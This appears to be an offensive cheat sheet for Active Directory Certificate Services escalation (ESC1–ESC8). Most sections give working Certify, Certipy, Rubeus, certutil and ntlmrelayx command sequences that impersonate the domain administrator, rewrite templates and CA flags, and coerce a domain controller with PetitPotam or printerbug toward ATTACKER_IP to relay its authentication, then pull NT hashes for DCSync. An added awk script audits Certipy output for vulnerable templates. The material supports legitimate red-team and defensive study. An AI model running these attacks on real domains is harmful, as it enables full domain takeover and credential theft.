
ESC1 — SAN in Template

The template lets the enrollee specify the Subject Alternative Name (SAN), so a low-privileged enroller can request a certificate that authenticates as any account, including administrator.

Conditions

  • CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT set in the template's msPKI-Certificate-Name-Flag
  • An EKU that permits authentication: Client Authentication, PKINIT Client Authentication, Smart Card Logon, Any Purpose, or no EKU
  • Low-privilege principal (e.g. Domain Users, Authenticated Users) has enrollment rights on the template
  • No manager approval and no authorized signatures required (otherwise the request is held or rejected instead of issued)

Certify

.\Certify.exe request /ca:CA_HOSTNAME\CA_NAME /template:VulnerableTemplate /altname:administrator
# Certify returns a PEM certificate and key. Convert it as Certify's own hint says (openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx), then Rubeus.exe asktgt /user:administrator /certificate:cert.pfx to get a TGT

Certipy

certipy req -u user@DOMAIN -p 'password' -ca CA_NAME -template VulnerableTemplate -upn administrator@DOMAIN -dc-ip DC_IP
# Certipy saves administrator.pfx; authenticating with it yields a TGT and the account's NT hash
certipy auth -pfx administrator.pfx -dc-ip DC_IP

ESC2 — Any Purpose / No EKU

Template has the Any Purpose EKU or no EKU at all → the issued certificate is valid for any purpose, including client authentication.

Exploit

Same as ESC1 if ENROLLEE_SUPPLIES_SUBJECT is also set. Otherwise the certificate itself can act as an enrollment agent: use it as the -pfx in ESC3 step 2 to request a certificate on behalf of another user, subject to the same template and CA restrictions as ESC3.

ESC3 — Enrollment Agent

Two-step: enroll in a template that grants the Certificate Request Agent EKU, then use that certificate to request a certificate on behalf of another user.

Step 1 — Get Enrollment Agent Cert

# Needs a template with the Certificate Request Agent EKU that a low-privilege user can enroll in
certipy req -u user@DOMAIN -p 'pass' -ca CA_NAME -template EnrollmentAgent
# Certipy names the output after the requesting account, here user.pfx

Step 2 — Request on Behalf Of

# The second template must accept an enrollment agent signature (schema version 1, or one authorized signature with the Certificate Request Agent application policy) and the CA must not restrict enrollment agents
certipy req -u user@DOMAIN -p 'pass' -ca CA_NAME -template User -on-behalf-of 'DOMAIN\administrator' -pfx user.pfx
# Result is administrator.pfx; use it with certipy auth as in ESC1

ESC4 — Template ACL

Write access to a certificate template object (owner, WriteDacl, WriteOwner or WriteProperty) → rewrite the template so it meets the ESC1 conditions, exploit it, then restore the original.

Certipy

# Overwrite the template with an ESC1-vulnerable configuration; -save-old writes the original to VulnTemplate.json
certipy template -u user@DOMAIN -p 'pass' -template VulnTemplate -save-old
# Template now vulnerable to ESC1
certipy req -u user@DOMAIN -p 'pass' -ca CA_NAME -template VulnTemplate -upn administrator@DOMAIN
# Restore the saved configuration
certipy template -u user@DOMAIN -p 'pass' -template VulnTemplate -configuration VulnTemplate.json

ESC5 — PKI Object ACL

Write access to PKI-related AD objects other than templates: the CA server's computer object (e.g. shadow credentials or RBCD against the CA host), the CA's RPC/DCOM server, or objects under CN=Public Key Services in the Configuration partition. Broad scope; the exploit depends on which object you control.

ESC6 — EDITF_ATTRIBUTESUBJECTALTNAME2

The CA registry flag EDITF_ATTRIBUTESUBJECTALTNAME2 makes the CA honour a SAN supplied as a request attribute in any request, regardless of template config, so every template that permits client authentication behaves like ESC1.

Check

certipy find -u user -p pass -dc-ip DC -stdout | grep -i "User Specified SAN"
# "User Specified SAN : Enabled" under the CA means the flag is set

Exploit

Same as ESC1, with any client-authentication template:
certipy req -u user@DOMAIN -p 'pass' -ca CA_NAME -template User -upn administrator@DOMAIN
# Caveat: a CA with the May 2022 update (KB5014754) embeds the requester's SID in the szOID_NTDS_CA_SECURITY_EXT extension, and the DC rejects the certificate when that SID does not match the account named in the SAN, so ESC6 alone no longer works against a patched CA
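To make the ESC1 conditions listed above and the ESC6 check repeatable, here is an added example (not from the original page and not Certipy's own code) that applies both to the text `certipy find -stdout` prints: an awk audit that flags every template meeting all ESC1 conditions and every CA with "User Specified SAN" enabled. The sample output below is constructed, and the assumption that the relevant fields keep the labels Certipy prints (Enrollee Supplies Subject, Requires Manager Approval, Authorized Signatures Required, Enrollment Rights, User Specified SAN) is an assumption of this example; on an engagement pipe the live find output into audit_find_output instead of the sample.

```bash
#!/bin/sh
# Added example: audit `certipy find -stdout` text for ESC1 templates and
# ESC6 CAs. Not part of the page or of Certipy; the field labels are assumed
# to match what Certipy prints, and the sample below is CONSTRUCTED.
set -eu

# Constructed sample (assumption): one CA with the ESC6 flag and three
# templates, of which only VulnerableTemplate meets every ESC1 condition.
SAMPLE_FIND_OUTPUT='Certificate Authorities
  0
    CA Name                             : CA_NAME
    DNS Name                            : ca.corp.local
    User Specified SAN                  : Enabled
    Request Disposition                 : Issue
Certificate Templates
  0
    Template Name                       : VulnerableTemplate
    Enabled                             : True
    Client Authentication               : True
    Enrollee Supplies Subject           : True
    Requires Manager Approval           : False
    Authorized Signatures Required      : 0
    Permissions
      Enrollment Permissions
        Enrollment Rights               : CORP.LOCAL\Domain Users
                                          CORP.LOCAL\Domain Admins
  1
    Template Name                       : User
    Enabled                             : True
    Client Authentication               : True
    Enrollee Supplies Subject           : False
    Requires Manager Approval           : False
    Authorized Signatures Required      : 0
    Permissions
      Enrollment Permissions
        Enrollment Rights               : CORP.LOCAL\Domain Users
  2
    Template Name                       : ApprovedSAN
    Enabled                             : True
    Client Authentication               : True
    Enrollee Supplies Subject           : True
    Requires Manager Approval           : True
    Authorized Signatures Required      : 0
    Permissions
      Enrollment Permissions
        Enrollment Rights               : CORP.LOCAL\Domain Users'

# Reads find output on stdin. Prints "ESC1 <template>" for each template that
# meets all ESC1 conditions and "ESC6 <ca>" for each CA whose
# "User Specified SAN" is Enabled (EDITF_ATTRIBUTESUBJECTALTNAME2 set).
audit_find_output() {
  awk '
    function trim(s) { sub(/^[ \t]+/, "", s); sub(/[ \t]+$/, "", s); return s }
    # Low-privileged principals that commonly hold enrollment rights.
    function lowpriv_can_enroll(r) {
      return (r ~ /Domain Users/ || r ~ /Authenticated Users/ ||
              r ~ /Domain Computers/ || r ~ /Everyone/)
    }
    # Evaluate the template collected so far against the ESC1 conditions.
    function flush_template() {
      if (tname != "" && enabled == "True" && supplies == "True" &&
          clientauth == "True" && approval == "False" && sigs == "0" &&
          lowpriv_can_enroll(rights))
        print "ESC1 " tname
      tname = ""; enabled = ""; supplies = ""; clientauth = ""
      approval = ""; sigs = ""; rights = ""
    }
    /^Certificate Authorities/ { section = "ca"; next }
    /^Certificate Templates/   { flush_template(); section = "tpl"; next }
    NF == 0                    { next }   # blank separators
    /^ *[0-9]+ *$/             { next }   # entry index lines
    {
      pos = index($0, ":")
      if (pos == 0) {
        # Continuation line: an extra group listed under Enrollment Rights.
        if (lastkey == "Enrollment Rights") rights = rights "," trim($0)
        next
      }
      key = trim(substr($0, 1, pos - 1)); val = trim(substr($0, pos + 1))
      lastkey = key
      if (section == "ca") {
        if (key == "CA Name") caname = val
        else if (key == "User Specified SAN" && val == "Enabled") print "ESC6 " caname
      } else if (section == "tpl") {
        if (key == "Template Name") { flush_template(); tname = val }
        else if (key == "Enabled") enabled = val
        else if (key == "Client Authentication") clientauth = val
        else if (key == "Enrollee Supplies Subject") supplies = val
        else if (key == "Requires Manager Approval") approval = val
        else if (key == "Authorized Signatures Required") sigs = val
        else if (key == "Enrollment Rights") rights = val
      }
    }
    END { flush_template() }
  '
}

# Wrappers over the constructed sample; one name per line.
esc1_templates() { printf '%s\n' "$SAMPLE_FIND_OUTPUT" | audit_find_output | sed -n 's/^ESC1 //p'; }
esc6_cas()       { printf '%s\n' "$SAMPLE_FIND_OUTPUT" | audit_find_output | sed -n 's/^ESC6 //p'; }

# Real use: certipy find -u user -p pass -dc-ip DC -stdout | audit_find_output
printf 'ESC1 templates: %s\nESC6 CAs: %s\n' "$(esc1_templates)" "$(esc6_cas)"
```

The User template is skipped because the enrollee cannot supply the subject, and ApprovedSAN because manager approval holds the request; only a template that passes every condition is reported, which is the same reasoning the ESC1 list asks you to apply by hand.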

ESC7 — CA ACL (ManageCA)

User has ManageCA (CA administrator) or ManageCertificates (certificate officer) on the CA → set the ESC6 flag, or get a SAN-bearing request issued even though the template denies it.

Enable EDITF_ATTRIBUTESUBJECTALTNAME2 (ManageCA)

certutil -config "CA_HOSTNAME\CA_NAME" -setreg policy\EditFlags +EDITF_ATTRIBUTESUBJECTALTNAME2
# The flag is read when CertSvc starts, so the CA service must be restarted before it takes effect; ManageCA alone does not grant that, and a patched CA is still subject to the ESC6 caveat
Then exploit as ESC6.

Approve Pending Requests (ManageCA → grant yourself ManageCertificates)

# With ManageCA, make yourself a certificate officer and make sure the built-in SubCA template (no EKU, usable for client auth) is enabled on the CA
certipy ca -ca CA_NAME -u user -p pass -add-officer user
certipy ca -ca CA_NAME -u user -p pass -enable-template SubCA

# Request SubCA with a SAN: the CA denies it (CERTSRV_E_TEMPLATE_DENIED) but records a request ID; answer "y" to save the private key
certipy req -u user -p pass -ca CA_NAME -template SubCA -upn administrator@DOMAIN

# Issue the denied request as officer
certipy ca -ca CA_NAME -u user -p pass -issue-request REQUEST_ID

# Retrieve the issued certificate; Certipy pairs it with the saved key and writes administrator.pfx
certipy req -u user -p pass -ca CA_NAME -retrieve REQUEST_ID

ESC8 — NTLM Relay to Web Enrollment

The CA exposes web enrollment (http://CA/certsrv) over HTTP with NTLM and without Extended Protection → coerce a machine to authenticate to you and relay that NTLM authentication to the CA to obtain a certificate for the machine account. The coerced host must not be the CA itself, since NTLM cannot be relayed back to the same machine.

Setup Relay

impacket-ntlmrelayx -t http://CA_IP/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

Coerce Authentication

python3 PetitPotam.py ATTACKER_IP DC_IP
# or
python3 printerbug.py DOMAIN/user:pass@DC_IP ATTACKER_IP

Use Certificate

# ntlmrelayx prints the PKCS#12 bundle for DC$ as base64; decode it into a .pfx before use
echo 'BASE64_FROM_NTLMRELAYX' | base64 -d > dc.pfx
certipy auth -pfx dc.pfx -dc-ip DC_IP
# Returns the DC machine account's NT hash → DCSync with it (e.g. secretsdump)

Quick Reference

ESC   Key condition                    Exploit
ESC1  SAN + low-priv enroll            Request cert with -upn administrator@DOMAIN
ESC2  Any Purpose / no EKU             Like ESC1, or use the cert as an enrollment agent (ESC3)
ESC3  Enrollment Agent                 Two-step: agent cert → on-behalf-of
ESC4  Write on template ACL            Modify template → ESC1
ESC5  Write on other PKI objects       Depends on the object (CA host, CA RPC server, PKI containers)
ESC6  EDITF flag on CA                 SAN in any template (see KB5014754 caveat)
ESC7  ManageCA / ManageCertificates    Set ESC6 flag, or issue a denied SubCA request with a SAN
ESC8  HTTP web enrollment              NTLM relay to CA